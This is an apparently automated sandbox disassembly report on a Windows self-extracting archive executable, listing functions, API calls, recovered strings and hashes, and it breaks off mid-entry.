                                                                  • API String ID: 445417207-3402441367
                                                                  • Opcode ID: 107e08c87e93fad4c53435c59cb68843c3bba686c2abf6ed1d18e7333e0372c9
                                                                  • Instruction ID: 9f21d5da206719ef795656f3a99c4aca29c2f3a6f843b30fc3aa7a82ff777639
                                                                  • Opcode Fuzzy Hash: 107e08c87e93fad4c53435c59cb68843c3bba686c2abf6ed1d18e7333e0372c9
                                                                  • Instruction Fuzzy Hash: 15110332280600BFD3119F69DC44F6B3B6AEF4A743F500122F241EB5B1D76A99259B2F
                                                                  Function 0046DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DialogBoxParamW.USER32(GETPASSWORD1,00010424,0046B270,?,?), ref: 0046DE18
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DialogParam
                                                                  • String ID: GETPASSWORD1$rF$xzJ
                                                                  • API String ID: 665744214-4100369387
                                                                  • Opcode ID: 85b5af2100440fdf277819e03728028de7558276097fea284aab0a3ac663ac98
                                                                  • Instruction ID: d0fdafbfd476d387ea184cbeea7568b10c65efd67cfed95f516feb7bbc297784
                                                                  • Opcode Fuzzy Hash: 85b5af2100440fdf277819e03728028de7558276097fea284aab0a3ac663ac98
                                                                  • Instruction Fuzzy Hash: C3112632B44244AADB11AE34DC41BAB3798AB1A315F14443BBD49AB181E7BDAC84C36D
                                                                  Function 0045D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __fprintf_l.LIBCMT ref: 0045D954
                                                                  • _strncpy.LIBCMT ref: 0045D99A
                                                                    • Part of subcall function 00461DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00491030,00000200,0045D928,00000000,?,00000050,00491030), ref: 00461DC4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                  • String ID: $%s$@%s
                                                                  • API String ID: 562999700-834177443
                                                                  • Opcode ID: ece0d03a1dd8b3eb9fd0588f22812643a8ada0bfa1ec36ba0d34af94c4035e1f
                                                                  • Instruction ID: 2e3f83d9b24fb8b2d44f64fc56a4aacdf1b03735ed02b3e3c2a353e696ef8791
                                                                  • Opcode Fuzzy Hash: ece0d03a1dd8b3eb9fd0588f22812643a8ada0bfa1ec36ba0d34af94c4035e1f
                                                                  • Instruction Fuzzy Hash: 5A2190B2840248ABDB30EEA4CC05FDF7BA8AF05706F144417FD10962A3E279D64DCB5A
                                                                  Function 00460E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0045AC5A,00000008,?,00000000,?,0045D22D,?,00000000), ref: 00460E85
                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0045AC5A,00000008,?,00000000,?,0045D22D,?,00000000), ref: 00460E8F
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0045AC5A,00000008,?,00000000,?,0045D22D,?,00000000), ref: 00460E9F
                                                                  Strings
                                                                  • Thread pool initialization failed., xrefs: 00460EB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                  • String ID: Thread pool initialization failed.
                                                                  • API String ID: 3340455307-2182114853
                                                                  • Opcode ID: 5e5de192ed6c1979f6c8786a14f67b2248a831af2806f4bc89ce657c4d408348
                                                                  • Instruction ID: fc7fac68c38c2457fcb1119f697641f7cb0da9b584d6d3c8547359b0fdfb97c2
                                                                  • Opcode Fuzzy Hash: 5e5de192ed6c1979f6c8786a14f67b2248a831af2806f4bc89ce657c4d408348
                                                                  • Instruction Fuzzy Hash: F711BFB16407189BC3215F6ADC849ABFBECEB65744F104C2FF1CA82200E6B659408B59
                                                                  Function 0045124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Malloc
                                                                  • String ID: (F$2F$A
                                                                  • API String ID: 2696272793-2592254738
                                                                  • Opcode ID: 992a2449a1df065b53766b32f2a14ec718e4e99e6b8db72f81d194e32c64a7e2
                                                                  • Instruction ID: da7bd4fae6fc8ec7595d461baa39bd71ea68ef230740c6a1cb346940462a630c
                                                                  • Opcode Fuzzy Hash: 992a2449a1df065b53766b32f2a14ec718e4e99e6b8db72f81d194e32c64a7e2
                                                                  • Instruction Fuzzy Hash: A1011B75901219ABCB14DFA5D844ADEBBF8AF09305F10416AE905E3310D7349A44CF98
                                                                  Function 0046DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                  • API String ID: 0-56093855
                                                                  • Opcode ID: a64527a2c32a694a8b5b54a7f0bd913b61a9bb2d3f7379615419038e6fc69004
                                                                  • Instruction ID: 357c68b2d540f2d3334a025382da8988c387e27e6566d5aa10ccf8be10d9bc2f
                                                                  • Opcode Fuzzy Hash: a64527a2c32a694a8b5b54a7f0bd913b61a9bb2d3f7379615419038e6fc69004
                                                                  • Instruction Fuzzy Hash: DA019E36F04285AFD710AF59FC44A5B3FA8EB1A354B10043BF905C2230E6358851DBAE
                                                                  Function 00451316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0045E2E8: _swprintf.LIBCMT ref: 0045E30E
                                                                    • Part of subcall function 0045E2E8: _strlen.LIBCMT ref: 0045E32F
                                                                    • Part of subcall function 0045E2E8: SetDlgItemTextW.USER32(?,0048E274,?), ref: 0045E38F
                                                                    • Part of subcall function 0045E2E8: GetWindowRect.USER32(?,?), ref: 0045E3C9
                                                                    • Part of subcall function 0045E2E8: GetClientRect.USER32(?,?), ref: 0045E3D5
                                                                  • GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                  • SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                  • String ID: F$0
                                                                  • API String ID: 2622349952-10944669
                                                                  • Opcode ID: e488ebc88c68a5e9b3528a5a302c6f662905369c4b4ef3623c0ad221b6d7e12a
                                                                  • Instruction ID: e01b65ac24e082fb611ebcdba5fecd2153e0144df5fdbc48d5f856ea7eb8d867
                                                                  • Opcode Fuzzy Hash: e488ebc88c68a5e9b3528a5a302c6f662905369c4b4ef3623c0ad221b6d7e12a
                                                                  • Instruction Fuzzy Hash: 52F08130105288B7EF151F56882D7AA3B58AB00346F048266FC4450AB2CB7DCA999A18
                                                                  Function 0046DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0046DBF4
                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0046DC30
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentVariable
                                                                  • String ID: sfxcmd$sfxpar
                                                                  • API String ID: 1431749950-3493335439
                                                                  • Opcode ID: cb8cace35d56329779dc94f20d398cd61f6c601c184ff72fce89f0b882bda760
                                                                  • Instruction ID: 0fa86cc792c7281ab19728972ebae7be9253c93750c588c3e809507727e96556
                                                                  • Opcode Fuzzy Hash: cb8cace35d56329779dc94f20d398cd61f6c601c184ff72fce89f0b882bda760
                                                                  • Instruction Fuzzy Hash: 82F0A772D0422866CB202F958C0ABAF3758AF04F86B04081BBD8595151F6B88D40D7AE
                                                                  Function 00479A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: __alldvrm$_strrchr
                                                                  • String ID:
                                                                  • API String ID: 1036877536-0
                                                                  • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                  • Instruction ID: ffebe9e4da2a84a2ac9007b2bc1c29376cfa945110ca231e2e228dbe0acb677b
                                                                  • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                  • Instruction Fuzzy Hash: 4CA158729002869FEB26CF28C9817EEBBE5EF51310F1885AFD5499B341C23C9D41C759
                                                                  Function 0045A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00457F69,?,?,?), ref: 0045A3FA
                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00457F69,?), ref: 0045A43E
                                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00457F69,?,?,?,?,?,?,?), ref: 0045A4BF
                                                                  • CloseHandle.KERNEL32(?,?,?,00000800,?,00457F69,?,?,?,?,?,?,?,?,?,?), ref: 0045A4C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$Create$CloseHandleTime
                                                                  • String ID:
                                                                  • API String ID: 2287278272-0
                                                                  • Opcode ID: 76ba019a19eda8312de6517611a7a61c2714a7bf9d9f5434fde20af2cd9cd059
                                                                  • Instruction ID: 72def717fd63e75ff6e27920e825441e7a18c1babf6266448015eee7327017e7
                                                                  • Opcode Fuzzy Hash: 76ba019a19eda8312de6517611a7a61c2714a7bf9d9f5434fde20af2cd9cd059
                                                                  • Instruction Fuzzy Hash: CD412030248381AAE321DF24DC45FAFBBE49B81305F040A1EB9D1D32D2D2A89A5CDB57
                                                                  Function 0047C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004791E0,?,00000000,?,00000001,?,?,00000001,004791E0,?), ref: 0047C9D5
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0047CA5E
                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00476CBE,?), ref: 0047CA70
                                                                  • __freea.LIBCMT ref: 0047CA79
                                                                    • Part of subcall function 00478E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                  • String ID:
                                                                  • API String ID: 2652629310-0
                                                                  • Opcode ID: c54249795789bc2a2c73d3f1d0463a820bf9b0a1da25e8066f0f49e19532121b
                                                                  • Instruction ID: 2474f481ea2f5868ffe56f9fd099ef1826bf67647caefeb37c0d877e7521cae0
                                                                  • Opcode Fuzzy Hash: c54249795789bc2a2c73d3f1d0463a820bf9b0a1da25e8066f0f49e19532121b
                                                                  • Instruction Fuzzy Hash: 4E31F072A0020AABCF24CF65CC85EEF7BA5EB41711B04812EFC08E6250EB39CD50CB94
                                                                  Function 0046A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0046A666
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0046A675
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0046A683
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0046A691
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 2e998e3b9b5c211648aeced6a31fc04b2054ec0a4e02de188bbb1867301de1ec
                                                                  • Instruction ID: 5d139e94114ab90d6d9124b4c864e77e0f3093cfe07441ddc0eb5249aeddd582
                                                                  • Opcode Fuzzy Hash: 2e998e3b9b5c211648aeced6a31fc04b2054ec0a4e02de188bbb1867301de1ec
                                                                  • Instruction Fuzzy Hash: 96E0CD31942721B7C3106F65BC0DB8B3E24AF15B53F004232F605951D4EB7445008BD9
                                                                  Function 0046D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcschr
                                                                  • String ID: .lnk$dF
                                                                  • API String ID: 2691759472-987548045
                                                                  • Opcode ID: 239639e55d03d9533d19cd5a0ec1c87c4840231d24f6432ddfa62d55a52c2922
                                                                  • Instruction ID: a3530db7fc038c4cc48c4f9ccec7194a9d2cc7083b1242b41abaefe5ec5a7344
                                                                  • Opcode Fuzzy Hash: 239639e55d03d9533d19cd5a0ec1c87c4840231d24f6432ddfa62d55a52c2922
                                                                  • Instruction Fuzzy Hash: D1A15072D0022996DF24DBA1CD45EFB73FC9F45304F0885E7B509E3241EE789A858B6A
                                                                  Function 0047B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0047B324
                                                                    • Part of subcall function 00479097: IsProcessorFeaturePresent.KERNEL32(00000017,00479086,00000050,00483A34,?,0045D710,00000004,00491030,?,?,00479093,00000000,00000000,00000000,00000000,00000000), ref: 00479099
                                                                    • Part of subcall function 00479097: GetCurrentProcess.KERNEL32(C0000417,00483A34,00000050,00491030), ref: 004790BB
                                                                    • Part of subcall function 00479097: TerminateProcess.KERNEL32(00000000), ref: 004790C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                  • String ID: *?$.
                                                                  • API String ID: 2667617558-3972193922
                                                                  • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                  • Instruction ID: 9644ec656fd213d174f9bcbacd228021034d2a5a8d7f1f0e314a8c4914ac1b8c
                                                                  • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                  • Instruction Fuzzy Hash: 44518571D00109AFDF14DFA9C885AEEB7B5EF58314F2481AEE858E7341E7399E018B94
                                                                  Function 004575DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004575E3
                                                                    • Part of subcall function 004605DA: _wcslen.LIBCMT ref: 004605E0
                                                                    • Part of subcall function 0045A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0045A598
                                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0045777F
                                                                    • Part of subcall function 0045A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A501
                                                                    • Part of subcall function 0045A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A532
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                  • String ID: :
                                                                  • API String ID: 3226429890-336475711
                                                                  • Opcode ID: fee90ea7d7b5eb905dc3a1594e6f4c10c272a2e077a1d5ff74b3512caa23debe
                                                                  • Instruction ID: a4b10064a087ed80d3c804be415e79d8a8584ec9efaedd55cf185a110c2a4813
                                                                  • Opcode Fuzzy Hash: fee90ea7d7b5eb905dc3a1594e6f4c10c272a2e077a1d5ff74b3512caa23debe
                                                                  • Instruction Fuzzy Hash: 2E419271800158AAEB21EB61DC55EDFB378AF45305F0040ABBA05A3193EB785F8DCB79
                                                                  Function 0045B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
